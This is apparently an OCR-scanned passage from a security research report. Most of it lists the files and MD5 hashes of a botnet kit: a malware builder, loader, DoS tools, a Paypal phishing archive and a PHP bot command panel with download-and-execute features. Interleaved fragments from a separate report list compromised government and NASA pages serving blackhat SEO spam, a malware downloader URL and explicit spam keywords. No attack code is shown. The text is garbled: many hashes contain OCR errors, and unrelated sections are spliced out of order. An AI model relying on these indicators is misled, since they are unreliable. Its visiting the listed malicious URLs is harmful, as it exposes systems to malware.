€2093424452318739f37bd65be369b41 
sql-vulnerable-sites-6.txt 
84fc14888689790335bed55acae35f6b 
sql-vulnerable-sites-7.txt 
2dd0cf89133527629c92d1859e7772eb 
sql-vulnerable-sites-8.txt 
9e3292a85e5baa84414a4f82ea4f7a0f 
sql-vulnerable-sites-9.txt 
b5968bf352eee3b36af030d5e75195f0 
sqlerr.txt 
6345f05ee049f43f37ed300d1d373dbb 
sqli found.txt 
0a14056fa7520151ac1720a3ff7bb5c3 
sqli.gif 23efd215f4f4af99ee6036d331215ee2 
sqlierr.txt 
a598cde83a5ea36651558b7daee881e0 
stop.gif c8e43745e10fed47f8e0acfdb1798733 
think.omp 
2f50f4a184033ac7de38c71cb9b26ed2 
thrabort.bmp 
99eb8b6b250686c5facaa910db302add 
Thumbs.db 
c7f848bfca8cf20e5c780abeef24b40f 
URL.txt 
b4208a15fe54aa32e0c182c7d7c12b46 
TeVDos.exe 
94ecd2db28320bcc800e5el1le96b0fdf1 
TevAttack.class 
2alc55afee03257d42e09938fa96816c 
TevDos.class 
e52a36ca84898f3388a4d3e96d3e22f1 
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Builder.exe 
3f7d582225db3a199fadb873579ddadd 
Advanced Shutdown.exe 
12df61cb509c75536465dec1340c4db5 
Default.ico 
76685dfa5860561a421b7acc5f5c37fb 
ResHacker.exe 
66064dbdb70a5eb15ebf3bf65aba254b 
Reshacker.ini 
212e2299f3813021916428283707054a 
Reshacker.log 
614cf6ff117c3a32c9b03dcc64db48db 
UPX.exe 
308f709a8f01371a6dd088a793e65a5f 
US Phishing Paypal.rar 
119905e7f59328b320f89dd5edf15176 
Client.jar 
2262a03f82c2e8ea733ee9dbd43bb8f5 
index.html 
c845aa5ce7b8751366e6dc2f24f823ef 


java.png 6f14f39c0d082a938c555bf67206b4be 
load.gif belcede97289c13920048f238fd37b85 


softpedia.gif 
5c596505177a562fbc7b4cb8f6760063 
clear.bat 

52d23a98ac068a9e7 39ed49bdd2424f8 
prjLoader XE2.dpr 
1fb2386d60bd6e06379103d597d13aac 
prjLoader XE2.dproj 
lee84a29efb9fe8f934beca74a3fd5ad 
prjLoader XE2.dproj.local 
dd7437fccfcba74a8aesefd64fd520f3 
uDllfromMem.pas 
7370d245044cc6a0f54313121319db256 


untinstallation.pas 


10987 


3f2ecd3af18f48d07f84alfdd3cfc5fa 
untMD5.pas 
c455a8145eeaacl9e8abcabf7c93c25b 
untParser.pas 
a53d405a515756bb8a07b0937e29ffd6 
untPlugins.pas 
3451f059eae55663cafeceeae7cd9f8b 
untRegistry.pas 
4c5c3a34aa79d1b3009fa116c19f1d0f 
untSettings.pas 
b54163c737c48efd7ad6c7d1df100ef6 
untStream.pas 
db15b31bd96e310677778c3bf510efa5 
untUtils.pas 
036585d633b3eb8ae349df580d87e942 
clear.bat 

52d23a98ac068a9e7 39ed49bdd2424f8 
frmBuilder.dfm 
1¢751a42bc743421600d6a5a93f7fa7e 
frmBuilder.pas 
50d81024c6cb30c6266ecd74646584ae 
prjBuilder.dpr 
b67ac615ad81e54b5accaa2a65c146c9 
prjBuilder.dproj 
f36d05d2bf76e334cedfd844547e96b3 
prjBuilder _Icon.ico 
b2bead7a8f94a1f60602c24134eb0918 
prjBuilder Iconl.ico 
b2bead7a8f94a1f60602c24134eb0918 
ext-all.js 
71e92c5f74755451a6191051896bead7 
ext-base-debug.js 
300e19b92568cc7d6d37b7fefc9703ea 
ext-base.js 
51941b5733d49119aaf396d350a9de65 
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ext-jquery-adapter-debug.js 
1e84f104d83e9815f1f902018c1a3182 
ext-jquery-adapter.js 
be6éfbeOlad2af7260d6b539eef44490e 
ext-prototype-adapter-debug.js 
217e191f7911795acf3725f64cf08c2e 
ext-prototype-adapter.js 
e77bf4aae60cc18928bf58aaf1ld174be 
ext-yui-adapter-debug.js 
03b2fdf6013f85513a32460681f31d51 
ext-yui-adapter.js 
712f83027507c14f4a086d80009a0444 
example.html 
768887aa189612081d2cbe0e2c20f6c7 
Ext.ux.form.CheckboxCombo.css 
8c091la6cdbc80bcfcbd706410d05cafd 
Ext.ux.form.CheckboxCombo.js 
457a5a0c91ada7a776931d0c39862b03 
Ext.ux.form.CheckboxCombo.min.css 
bf1b89a740e5caeclfdd69047d9e06d3 
Ext.ux.form.CheckboxCombo.min.js 
10b019982caf2db55385f04848bbcff5 
dwsync.xml 
b2579ceaf3ddf1504bealaaaa2cel1f97 
add _command.php 
0e209029ed26d0bc406b7 2fabf07221c 
auth.php 297acda42a53c032911d45107d6254e7 
bot.php 
4e7025cf239b7997cc7ee59378abaab7 
countries.php 
8cbaccaca7768e581135c8d7d7f68d9e 
delete command.php 
713d602bb08d8e53e70220dab4048d71 
GeolP.dat 
cc2e8c24a6de1455a0d4217ac67fdd13 
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geoip.inc 
122aa7a662c496ab6c4b7defbe32fd01 
index.html 
dc77104e03216dd378ea44d702ffdf42 
install.php 
1989db377f5c7ab64b0745019f59c8ff 
JSON.php 3ce5a187c2869122f7cbcd14eec99447 
list-view.js 
77771154a6f844fb0617c80ffd5dc7ce 
list bots.php 
b74452b67482586d4a7d085870f74fe5 
list _commands.php 
502cdf606efceef1351a4b3d33ac41cf 
list countries.php 
f4f665a38dbe7ef650438214c335f272 
list countries command.php 
e05cab1750aba6e5c6a9d3984d3bad2c 
list countries _pie.php 
50ccb36b8b6495b0a4a21794c05017b0 
list _installs.php 
f46e1020f690374cbabd52cce6ff0022 
list plugins.php 
955c4cd3e0c57db35e0718d674fa6f27 
login.js 695d86f76053733dd90fa5095954fd90 
login.php 
649ff65c9065f33c5a08f05eled32f48 
panel.php 
1137596c0955c04d9f64ed3e40a925f5 
style.css 
729b5d4be691cb337e0a3165b407ec10 
upload.php 
76c8fd7d6208a7833fdd32132c2258a2 
upload _delete.php 
32f21046558c3a11610c4fa5dd3369dc 
upload _informations.php 
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b9d133a0197dd8aee4b3e1ldda69c3e60 
desktop.css 
639bac7c7c35cd13bdcc2cecOaaef7ef 


ad.png 
cc750844215aed20b2b05c10d6082b0d 
ae.png 
7391e6b6df7b181d51ffeb2a5a6d7bd4 
af.png 
ae7c58272ae46cde945ccc4bed00fe9e 
ag.png 
390af4c36d462bbf2627a1182946825a 
ai.png 
08cf0788a582710062140f69887300fc 
al.png 
7c5bc720b2cf3047c9fab800e271eec9 
am.png 
fd5d9d1d864ea76406afec5e11f2632f 
an.png 
7d7d682a9dc9f2a26ab6dealfdb87334f 
ao.png 
41a8aale11f7086d2413d8d9a777680b 
ar.png 
2fa357868e66flaec9c4c4230baa45b3 
as.png 
96e49204e758277b6720584c4d844ecc 
at.png 
62bf1a5653692b34b2ee1f734a59b062 
au.png 
2fba49c88880e9ffcff947015cb7ab9c 
aw.png 
6e82279ceb4702171f345fead7ff3e35 
ax.png 
27708378fcc025e375fd3c303fclcbd6 
az.png 


d63f5c99e25eca9de2a97f63161f38e6 
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ba.png 
cbb6ce46c69el14bbd8d2c8fd91680d33 


bb.png 
47c8aea417660e5f4e8b5a7a73f2cb18 
bd.png 
fO2d8deb9de271cd246646872798af15 
be.png 
2404b88a07bdb7aef652eecO0f6fce287 
bf.png 
cc65efa74cd7367933ecd52115204b2d 
bg.png 

77b62183ab10cd26ee4e7 9fdfc12b8621 
bh.png 
5bbf6106968b2517d924bac4d99b41bd 
bi.png 
427c72cd341f288faf0e62f03586c7ba 
bj.png 
67bd2e990cc7e3dc5bbae821fd38f20c 
bm.png 
cf195bf1921659202cf8ae899e9171d0 
bn.png 
4911cd2a8fae48d82f9ce124d908be3c 
bo.png 
151854ff619d7a44894a37b5be73f463 
br.png 
54c40b8a9ad7df4783d19acc05910f8e 
bs.png 
8b45f84cb140ec2448692187a82abfc7 
bt.png 
2f13e87c1868b03b0b47cd0bb60737d5 
bv.png 
559ce5baaee373db8dal50a5066c1062 
bw.png 
15d59270fb25d9e467d5a730682c5644 
by.png 
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st-2.x.cityofchetek-wi.gov/porn/st2/409.html 


The following URLs redirect to the downloader : freeclipoftheday.com/moviel.php?id=4154 
&n=teens &border=FFFFFF &bgcolor=000000 


Detection rate : Result: 9/32 (28.13 %) 


File size : 75771 bytes 


MD5 : a74b09c7e6ca828ec0382c4f4f234bac 


SHA1 : 2861a4215dd2a579afele30372e05d2ea00223f2 


big girls do cry, big gay muscle men; big girls don't cry jersey boys, 


big girl anal movies; big girl pic; big fuckim dick 


City of Somerset, Texas official site is also embedded with the same blackhat SEO content 
structure, which leads me to the conclusion that these two are related : 


2k.x.somersettx.gov/porn/2k-004/156.html 


2k.x.somersettx.gov/porn/2k-004/313.html 


2k.x.somersettx.gov/porn/2k-004/829.html 


2k.x.somersettx.gov/porn/2k-004/830.html 


st-5.x.somersettx.gov/porn/st5/103.html 
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9e18ac464c49a91d90eaf11ad21357e9 
bz.png 
6e14aaafe632fe367409415545c27e73 
ca.png 
8618709a45d8d1c4d9d254c61bdf29b8 
catalonia.png 
76991f3da407b7dec2603ff86f1b9724 


cc.png 
ebbfb19d79975289e7a9cbb12caf0a23 
cd.png 
34e2a72a9cb9e873db413b020d7f1845 
cf.png 
252d14145f4c47374a3e0bc2bb8ae0bf 
cg.png 
b5bed6c75a72dc56f8eb8c559d437f59 
ch.png 
€67b19a7767114078cda2b3c874a5d5b 
ci.png 
90e8d52c215176bb04b7453b84e6fa43 
ck.png 
e€70409285b72ac2ebd8d6ee1849e4083 
cl.png 
dc7b3be27813faeb454d02b55b79b9e3 
cm.png 
f5cdc865bf36948532707c42e716el14a 
cn.png 
a82ff00f39eff54062328b4474c33dbc 
co.png 
4bd223b284a0900cda6826ee656c5333 
cr.png 
cd28a01f91e89fa2b844857642fd5fb7 
cs.png 
4db37e9044c342fb819515d13768e058 
cu.png 


9d5366e9b01d5cd428429e608433d5f3 
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cv.png 
2f4edfdcba4cdb3fa903047a235f3296 


cx.png 
8efc55a14b900c47f4b920c4510f192F 
cy.png 
f29741d622fe02759bb7a2a91eb5e2e0 
cz.png 
815b6d2bf60a3179c0652f0b6895bcbb 
de.png 
ddabae687ecae5edaaeb808d440543e6 
dj.png 
197e6fc2579eec8bcd7303393de841ba 
dk.png 
fe926c8271b35febf4a6cb0a41b111leb 
dm.png 
85845da8ae28e94f2885ceeb16515dd0 
do.png 
153949105845e18a133a4c778b3de31le 
dz.png 
c57f3c0951ba1525b3359fcOacbfd6b1 
ec.png 
0152114421e281913d0c1c148e196c92 
ee.png 
1lcdfaaal0ff170ce19ed46339efe3af6 
eg.png 
09c48d3562f0dc51e2f9507704f6437f 
eh.png 
7dd5a46a34bee2f10532f1213a941d7b 
england.png 
73f2f220f6d51d249e45a04d9a03da91 
er.png 
481d394ac9a44f3040f7c457fc1f23a6 
es.png 
d6693ce2a6346b2da89ceda335554e0a 
et.png 
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73763e46da896f3e951954ad473b4a4b 
europeanunion.png 
ffce5e64df4d367a20el1ef4033f60257 
fam.png 
0b36de21772c8d87e1d0106878b65231 
fi.png 
e30bd2493de78c998d1ac6c22d20146b 
fj.png 
7¢3e78e31bb34b0fafbb0865737f8d36 
fk.png 
9627317fe9a5757ee8c06df7d8e8a887 
fm.png 
d3767ea95466571e10c7e563d456d754 
fo.png 
d0e6b0a3fdb4e2271b5b5057bd969966 
fr.ong 
clcf1874c3305e5663547a48f6ad2d8c 
ga.png 
972da84bdeal359d69c719a37d89d219 
gb.png 
0894999b108830afc0733ee7b6e08310 
gd.png 
95b8b79fafc6b1510978977bc8067b46 
ge.png 
aa40721b7al179f6c9c8f666a64063767 
gf.png 
clcf1874c3305e5663547a48f6ad2d8c 
gh.png 
12da850e724de5ff779572bbdb8ded71 
gi.png 
O0ca5a4db2ac11c8a5cb57701b18b8088 
gl.png 
073b6bf37f6eefe07145d9dd89bc9e7d 
gm.png 
a7d785fa41e66a5e6d82301688686f20 
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gn.png 
acba9c908c29db8aa890b6a20265ac22 
gp.png 
c2dc0a2062b24f906431337186888f01 
gq.png 
70f6462b38b8a21152e7446a1b3e1133 
gr.png 
fd9b321b80be31c027585c8992f1799F 
gs.png 
3b510d36dc70edd5b301da8096c9b71¢c 
gt.png 
384e9d38421a6853f9c35d48d8c49a85 
gu.png 
2d058f7cea364d247fee5bb53fe70390 
gw.png 
35eb1d9b882111ccec5f58cd778364bf 
gy.png 
d816170967c67a98db73cd89c56014fd 
hk.png 
389d0451c5c2ff40e88a93588dcbd6fl 
hm.png 
2fba49c88880e9ffcff947015cb7ab9c 
hn.png 
ac9242c256af7800a223bdcbf0798f57 
hr.png 
0868c49000b253d9b4f290471898c961 
ht.png 
b5360c0f01d574333b3bfa27c3dce856 
hu.png 
6c6fce8ab6fd09c340964b00c5e82a8c3 
id.png 
fed538f9c8cd0500a6a655b55426744c 
ie.png 
48e42d0d1451e7b19b7b79d631a3a95c 
il.ong 
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a135fcdefe8a391b416bdb102476e12b 
in.png 
50d62cba8134c8c097d073646cdalb9b 
io.png 
38afe5a0e9817027e1f1615028aca521 
iq.png 
39cfe476621ad630cf3418c3234f0594 
ir.ong 
2ac099e190547501704d309d59831d2b 
is.png 
7fffd4flacabc2ccc890049e48587e8a 
it.png 
784f7eb333f0591558bcce9616a3c105 
jm.png 
a582c95e205f76277afa1571940121cd 
jo.png 
9dd19e8da30782b2bfb9b5a0d1c51e8b 
jp.png 
10958397bc7c25c746e6e122365c003c 
ke.png 
357152ed37ece2a45a7d57c5bf30ab3c 
kg.png 
192033ce169b1b107dc4aabb1f635cl1c 
kh.png 
8658c066eb4f9d6c15efb31a821b482c 
ki.png 
703ced92b97cc2713038f0d50ee5a0f0 
km.png 
cc942486999d072021c0b3582306f834 
kn.png 
f096727a7612c065259c6334b61a8b6a 
kp.png 
Oeaa3e8dc84bae9283a9969F2e360080 
kr.png 
cf63c15bf955e54afed8061497c7f7ea 
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kw.png 
2e0485cdb9ca8240c9fc372e4cef0eb7 


ky.png 
da2c56cc2568d516031e3082713fd90c 
kz.png 
6d51066ba152b15fd05d761745333135 
la.png 
3375d707535d69248f0ab23ef80268c8 
lb.png 
dad5d86f0d90cca0ff4ab5332d7fd7fc 
Ic.png 
18c05f2c79f8774bbb201593b20a06e2 
li.ong 
822034b39b46abaa91127f8342092a32 
Ik.png 
4e90c553f186c9776976b5b11dba4ea4 
Ir.png 
3b6d8d720721f68ceb465249aad32b27 
Is.png 
€228783a0785a8541d96d5515a2al6cf 
It.png 
95efec9db9d274d25fbb98eb53a9c384 
lu.png 
3be0b3a6096e9d77d9d7b997d464e612 
lv.png 
6ffae4cc65036d3de052a58e062d1led7 
ly.png 
3f9d6e8cba5fd7cb8c201lacfe9b7bc15 
ma.png 
c936b9f794def7d85fbb4c120d68684e 
mc.png 
63c6fd073106c8b0eb7336d9c19653a2 
md.png 
€414980c55af38676c5312bd330d6bb9 
me.png 
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7a2ee5d/7flbc5ef478106a86d2c1cc09 
mg.png 

5aea24al18ca7e8b657 70dcf2a738dd08 
mh.png 
948dd15821a6fe45b0df8667b6601ead 
mk.png 
617997cbcaafaea0035a4c0474ael16dd 
ml.png 
d951cb1c43a8077167b731alaea70b6c 
mm.png 
82ad2104b5490e1f6adfcfa777ab8243 
mn.png 
4adb9a834188753731add527aa4f67f0 
mo.png 
6339bdf0e24c871301d1fc0207e2685f 
mp.png 
929b9802e7bfb58bab0330a4c6925595 
mq.png 
be5fb2cd33e8df1l3e0b2f2feffb937 3f 
mr.png 
6clcc8albabe91421a38ddc573ee7cb4 
ms.png 
bfddbc2aae078e0aa80633F784e18526 
mt.png 
7a7ee4f98185ecfb6elba753aa6f2111 
mu.png 
48d5cbc23fedfbb77b06ed0e9b04522f 
mv.png 
24c90cfb0c883f9d1b303276c3b069e7 
mw.png 
1d2b8e369b2d4384d1ab4b24315fa139 
mx.png 
479a865f838c70d654a9f818a23f9a7d 
my.png 
e1c0f262c141e8615f819b1cd18393d3 
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mz.png 
159c85011041bea6bd3c68b6ba2919d7 
na.png 
€582101531b620fb0138c83602aab920 
nc.png 
ad8bf708e9db5fa423b5da123c914378 
ne.png 
f2eccd65605d8babcdd3af4b01215ecc 
nf.png 
c624a221dae959256a3e143a5147f825 
ng.png 
0c506131e1841cee782e4faf5cec89a9 
ni.png 
f43a5f35488513de58e2e5fbda9a98db 
nl.png 
6186550ebc77b1c51cd3ae37e78c33cl1 
no.png 
559ce5baaee373db8dal50a5066c1062 
np.png 
52c16445053dfl3abb08cedbe82f1f28 
nr.png 
2fb04b74787698835b63a46cbdef6fab 
nu.png 
9a2f682db640flc36ee40f296f63dc87 
nz.png 
179cc39a58e324dfle9al9a5eae9dca0 
om.png 
7b002bc8c4ab1a85c2c807ec2c4442d2 
pa.png 
64795009d69b36b6a4461b8159dcf356 
pe.png 
d1led0462edb8cbc3220b7aca250b0437 
pf.png 
e59d18e48cf0924687618bbf60ea4fee 
pg.png 
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48f68aaeefaa3b8ee/celfl761e6c1l1d 
ph.png 
8ff2d08518d3e1224d34467f5e24fcc2 
pk.png 
3bd18971ec170e6e9c461026068508da 
pl.png 
fad0e96c20f20be196499d26a6c74cd1 
pm.png 
ba41b8c349070250f814188080c2a8e8 
pn.png 
e4dcc857f534b48e8377ee36f63be013 
pr.png 
40b7fb1a4clebb076d40f0df5c6fd59a 
ps.png 
68d5f99924c67ef7d3b3aa32ff22b805 
pt.png 
5b8ab69ac52129bd32a3927f1b94d170 
pw.png 
f2bff7cd01d8eff6401e811f3debaf4f 
py.png 
b9d3d10b185a3144e21a452903857870 
qa.png 
c1dc363a27f5b5d19e24032747d7bedf 
re.png 
clcf1874c3305e5663547a48f6ad2d8c 
ro.png 
d038c9c152c5e14f875c7b13afcd4711 
rs.png 
5b672e3ee63317614288615ba07 74bf7 
ru.png 
Od31lef75adef220e73f0cb93a84a7422 
rw.png 
bef92348e3ea38dc462326elba2ff622 
sa.png 
605884cec6f446d418a092c0941acad5 
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sb.png 
5e4b74f8a611742bdc3a04629e871eb4 
sc.png 
39650e922851e1b72165d7b016dc3b44 
scotland.png 
eca5bebeb6e4dbc9eb858d4f58ea3f9de 
sd.png 
b972f90fea3369c020d258d1b860a6e0 
se.png 
4c01f06db23324267e2802dcade3572f 
sg.png 
8af65159c137a6a7ed3d1bc9c2eed18b 
sh.png 
e707aacb0986ad7a4a60ab8d82cf093d 
si.png 
d94ea79a5a8e0b6900941a1271c58191 
sj.png 
559ce5baaee373db8dal50a5066c1062 
sk.png 
5a7edc7e4492629ea5ce24b830839d32 
sl.png 
73904ec1cf4f0be282693c4e954e5821 
sm.png 
56e3c1b483bf27e619146b50ee5181bc 
sn.png 
501a5fab662d127ad588825cd0cd4954 
so.png 

4be2ffc4d06de407434a87 7dc03ff88b 
sr.png 
8f9aca73767b8e7876c72add438a6007 
st.png 
ab272a50ea656512c036cO001fcaca6lc 
Ssv.png 
c6c853766dfbab2ddd225980d3012f5c 
sy.png 
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Town of Norwood, Massachusetts : 


sql.norwood-ma.gov/libraries/transformations/.dir/132/valium-cost.html 
Idap.norwood-ma.gov/htdocs/js/.dir/12/valium-online-order.html 


Several more high profile sites hosting such scams | came across to yesterday are NASA’s 
Worldwind, and the State of New Jersey that used to historically host such pages : 


issues.worldwind.arc.nasa.gov/secure/attachment/10781/Buy-Valium.html 
issues.worldwind.arc.nasa.gov/secure/attachment/10800/Valium.html 


issues.worldwind.arc.nasa.gov/secure/attachment/10791/Panasonic-Ringtone.ht ml 


nj.gov/education/voc/9/2007/ 
nj.gov/education/voc/9/2007/viagra/viagra-online.html 
nj.gov/education/voc/9/2007/zoloft/buy-zoloft-online.html 


nj.gov/education/voc/9/2007/tramadol/discount-tramadol.html 


Moreover, during the last week, another pack of sites were also reported to serve malware, 
spam, and blackhat SEO pages on their servers : 


[4]Collateral Damage: CA County Site Redirects to Porn, Countermeasure Causes Major Hassle 
[5]Arizona Government University Site: Hacked! 
1103 


a0886eca3ef87d646af1514d025752f6 


SZ.png 
€97675a21b5280b9cb4c1fc99aab004f 
tc.png 
50733ccc670058e9a737b652089287ca 
td.png 
6c8d3f6c96bcd5d34a0bae497d0el3ca 
tf.png 
f7ccbaa513a24eb3dc4c7860ab8007ee 
tg.png 
5c62720575f9 14 ffff9fe06e2b9c1b95 
th.png 
af85286bflcadae9c2c636fe83195251 
tj.png 
5cc548d1858d19f336ca7390b381ad07 
tk.png 
896fb1a34638a76361d4307668cd5414 
tl.png 
093e76da6759647c331ea75eflba9da0 
tm.png 
b36ce71226fad4da67764e05b800292b 
tn.png 
ae9947d99c48894d1d1824d624361eb9 
to.png 
ce868fde2d77788a669001995f4b7 3df 
TOTAL.png 
0b96349a288533fcca644e6alc3ee2a2 
tr.png 
31ea1f705854ad57c432845068bd05d3 
tt.png 
9ead47e1d48627b1806cd992b62c8c2b 
tv.png 
6fec556dd8bd936ca706b0d7cc864993 
tw.png 


0e41af2b3ca03d145e7665d0821931fa 
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tz.png 
C846788492ef1188f631113bd8cced5c 
ua.png 
7ef7a6f5def3a4117d5c2f08e37008ff 
ug.png 
17e134aa84a076bf5541f5d11c616e5d 
um.png 
fOf12f4afaccb13ea40e15f3b81c5921 
us.png 
968591e0050981be9fa94bd2597afb48 
uy.PNg 
9ca8f3d9b1b1101d30a4555c997e871b 
uz.png 
37e4bdb64229f4624cacec7d4297214d 
va.png 
493642ad6bf3a344602fe006e7d44fa2 
vc.png 
60eec8d579d55ea0f2ec62d837c104d2 
ve.png 
3aee24fa5f6a85f5ce452001182fdccc 
vg.png 
79ef17575149f2663df51419f39feff2 
vi.png 
€95b9175142cd29177a9b25e16c3fc39 
vn.png 
638136bla6f5dab7beb6cec84fcc2cd53 
vu.png 
c37b82a52cdf80492ee94dc7f46256cf 
wales.png 
42¢7ca83721190322499c94d7ff2ae26 
wf.png 
86cclaa337ebb6cb74a2c3196770a7f5 
ws.png 

68183f64328d121a9ee7 7a92319bbfcd 
ye.png 
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290e09160bb2ef42ba8129a41159eb07 
yt.png 
f46c7cd7b2474cbcf61c5b2007a7558f 
za.png 
98e1044d0ffdllafc67a79f3676ba97a 
zm.png 
ec69def9e77d23446867caeb4a5223b1 
zw.png 
e7ae0b7e3c49a5a775a9d6854912e21a 


back.png ad22f4334ecfb3e893b916a79cclae67 


background _gradient.png 
fa334be3983fdb4bb08e38282d55fc01 
banner.png 
1la4a39afcddaal3f7de563b00cafbae0 
clear.png 

b94da2d715c62e91c9de7 7ae8cdf4e6f 
cross-button.png 
b94da2d715c62e91c9de7 7ae8cdf4e6f 
Download &Execute.png 
0552d1746701df879d14c2fdf3d5ac41 
download.png 
0552d1746701df879d14c2fdf3d5ac41 
Plugin.png 
1c1d8fdc22c9163f5c3fe7356d9099a4 
refresh.png 
eb52da0cf4a326a8a3831ec64798bb93 
Uninstall.png 
1764d2e728759d84f558455afd1305a8 
Update.png 
c9c9a89637716392908e9a7186ad0aa6 
Visit. png 
64c6eb55ead1f4fecb2c645f66d9079e 
accordian.gif 
cOfac02266835e558c454c8226a37eb5 
add.png 
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5265350be4537a07197093276da801df 
bogus.png 
8731d3f8f0ec4ac62d1d0f23204d95d0 
bots.png df9178999ef059eedaab8b1b78da84de 
bots48x48.png 
f262a369c3c5eeb6dfe6867f2ae3c8fdd 
bullet green.png 
Oaa5b2cba78b529ca35edf2a1315b753 
bullet red.png 
d24ba377f08a9c74b32e28488a0f56a2 
command.png 
759cce46b3b555eab316a62f3308b789 
command48x48.png 
15c79eb88ffb7499e691df94e92017de 
download48x48.png 
c665b5b12f7dd6c906a46746a752af6c 
globe.png 
9ec162da7779daf18301da265222e66b 
globe32x32.png 
af59106f40c66793b2dd6bb536f7339c 
globe48x48.png 
2cb34b1lee9e8a71337ae3b9247f41de2 
hatch.gif 
d4ab261f351d984e583f6298d1689d6d 
hd-bg.gif 
8009002d5ae2b48d5148572dde4d3545 
hd-tb-bg. gif 
4cba9d5f4830e9a8dal1819b67fla724a 
icons-bg.png 
8109fe6a35207d8bb2b102eecae59ca7 
install48x48.png 
70166cf855f77fb17a62fd87186a99ef 
launcher-bg. gif 
17113b03674cf859c9da3c8d4c3677e3 
launcher-btn.gif 
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3afec495c868cf95db39b9a4ae4b3040 
s.gif 
fc94fb0c3ed8a8f909dbc7630a0987 ff 
socks448x48.png 
017df6161889182a2815462ead2c1478 
tabs.gif 9e7c8dab2fc30dbf894b53252d3c7dc8 
winbar-bg. gif 
e9e7a6150d8113d950f9869bff78540f 
winbar-btn.gif 
94f07f13833115696alcacOc48d9eebd 
windows-bg.gif 
b707d9de918913e8bbaa74e2e7bb2473 
item-over.gif 
alcf748839dc751c46e432174d49934d 
scroll-left. gif 
cea7198b278f4a3b10bf3296973519ad 
scroll-right.gif 
b3dd893a27617e38c4757c2387cd73e2 
start-menu-left-corners.png 
9beO0b6adbc30502c4b68d9ed0f035aa6 
start-menu-left-right. png 
17da8055199e15a5d883845a65747685 
start-menu-right-corners.png 
e44bb8da83b76ed841b538565686d3b8 
start-menu-right.png 
617cOe5c80cec71fb1lb75c4del1e4157a 
start-menu-top-bottom.png 
bad589767678c242826014406cd9468c 
startbutton-icon.gif 
9e54968d44c9afbec19667fe6809bf32 
startbutton.gif 
e3f266b4f33e9f9a69218be159a9d278 
taskbar-split-h.gif 
68f56575a4837f57d4d5b3a9a21fa459 
taskbar-start-panel-bg.gif 
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e352028aadc1597378eb3cc39c17537d 
taskbutton. gif 
58f32a6a53b4d2al1fc1d0395bd77005d 
taskbuttons-panel-bg.gif 
ba3a5e2113747924679c1e6161e1fd32 
«htaccess 
209634bb0238704c4874c35d615ae59e 
config.php 
efb28a457cb58982f0delc720f45efea 
funcs.php 
1221cb0cb4b5816947c5aacO09cf4cee8 
App.js 
003cea295cbfa380e61f4ccbO0cd52aac 
Desktop.js 
0e567c84424500fc89b101d030b1f8e7 
Module.js 
1¢c5f71d437b3b7d7d2cbc663574aeaff 
StartMenu.js 
f3fec9082301eb0648eca650bf4c148c 
TaskBar.js 
3b87a20773924a0afc6d12ec9d86378d 
desktop.jpg 
d8a09829ec0c0ac4168ba213e1480305 
fileuploadfield.css 
7bb3df639b5444adce7d70c7580fba8a 
FileUploadField.js 
d0f2219598f901fcb73c6984667bf580 
AwesomeUploader.css 
05c1c7580d98e42e3233ac5fala87667 
AwesomeuUploader.js 
32¢c058be8334b655f113b3ee17388551 
cross.png 
42492684e24356a4081134894eabeb9e 
demo.html 


9af4970fbe4c24d30fefd2f16391bf6b 
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Ext.ux.form.FileUploadField.css 
7bb3df639b5444adce7d70c7580fba8a 
Ext.ux.form.FileUploadField.js 
d0f2219598f901fcb73c6984667bf580 
Ext.ux.XHRUpload.js 
f032a56a48f7bf2a9acfe2004104d37a 
hourglass.png 
b88dbbae104c8c7c939641993b2872ae 
LICENSE.TXT 
65f7f33ae359c3840949330e386e795e 
loading. gif 
00ef871b291bc03a497d608a5bd8ec99 
swfupload.js 
37b9315109dbf457ec1f6é8b2e9fcf110 
swfupload.swf 
3alc6cc728dddc258091a601f28a9c12 
swfupload.swfobject.js 
9cf88d567c218192eb26bf3b27763b83 
swfupload browse button trans 56x22.PNG 
294180fa585e00fab378e1d9b5a54595 
tick.png c9b528b9541e127967eda62f79118ef0 
upload.php 
e4a4e95a6c12b69485dac0c49e94f45d 
xhrupload.php 
fc51dc3a2018bdccca0e16119953cb14 
charts.swf 
923c8afe50fc45ed42d92d6ab83b11f6 
expressinstall.swf 
8c4bdc47410fc7c000dcd1655e2f3a7a 
debug.css 
da6beba976980f166fdbc694f7c26e26 
ext-all-notheme.css 
4a440f9e3eeb9a28148f1e446dd857c4 
ext-all.css 
a76bc484756d60e4514690064d4bcff2 
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README.txt 
ba53d937fdd2a4e56015ca880c20d09e 
reset-min.css 
33228fb5acaf77d8e2e6b7465a8369a4 
xtheme-access.css 
a03d6b120e2d61cb75808de9821cd682 
xtheme-blue.css 
30647d244ae996d5d0185ae04e104c8a 
xtheme-gray.css 
a837dfe3ebdf8173c8cb8c125ee237de 
yourtheme.css 
*754514526ca22aa6564c4ddc2fb1932 
borders.css 
9eeed46e9b34ea0f42093ba73f8c4dc5 
box.css 
68c8cd2ce881975686b6e1d94f4c4e31 
button.css 
c104f1e999de14b56a23387dab3c279b 
combo.css 
24d8382683c8088752314175faba2c07 
core.css 03e14eb0e93b69d7b0af9cd67a4152fd 
date-picker.css 
ea7d9e532dd4140c6f676f8e58c2c90F 
dd.css 
682d786fffcb42afb3bedc8f8099ce75 
debug.css 
1980a81744c410bf25b1cf1lf1b436c1b 
dialog.css 
4c9al16edb2278c8e72db093fle6f3c73 
editor.css 
9babb1f7c6f4218e818b3c82da13a0d6 
form.css c192a6ae256cble16cb6c87d39c05b7c 
grid.css eObcf132b5cd5f2172c74b10936c1636 
layout.css 
4f01d71b5e635c3821e7d395579567bc 
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list-view.css 
a3969f9cd5b74dd058d10887bf227b29 
menu.css fb4cc562b71db466ele8b2eebfc38e5e 
panel-reset.css 
8ed814ab8b86a7e4881d8751d2315291 
panel.css 
9d574df4d060d95f18c1673c0679fd68 
pivotgrid.css 
b32d66570062328ecec752cdc94b23d7 
progress.css 
ce08dbede23ef07739ca94f14e34bf5d 
qtips.css 

3624668402f563f5cfc680e899712Ff40 
reset.css 
29ee125f5c6db00ff0bdd3a8a4026c15 
resizable.css 
520b0bf212fcd85c65a7d45c33b76723 
slider.css 
656c9e9506273334dce4360ce5bff572 
tabs.css db70731bc1b9a675a283cf6f52a0872f 
toolbar.css 
1bb77f4ff17a524496d858b0237f3b5f 

tree.css f91a5805428983e3ad1dead32043d3f6 
window.css 
e€6d276c366a7a3bb35f97d07b1740ded 
borders.css 
46742b8ddcOdc80acc2ed9ec59e60774 

box.css 
1b78cd3ac948ef9d4d0d617793c8b050 
button.css 
aQaa0dedec5221a054a7cf72e5b97dab 
combo.css 
0bd4b8739beal2b22617c8e4c304354a 
core.css e8e7f293b724033528d656266ee33d76 


date-picker.css 


11011 


dbc64961295159c29420394c6dbb48de 

dd.css 
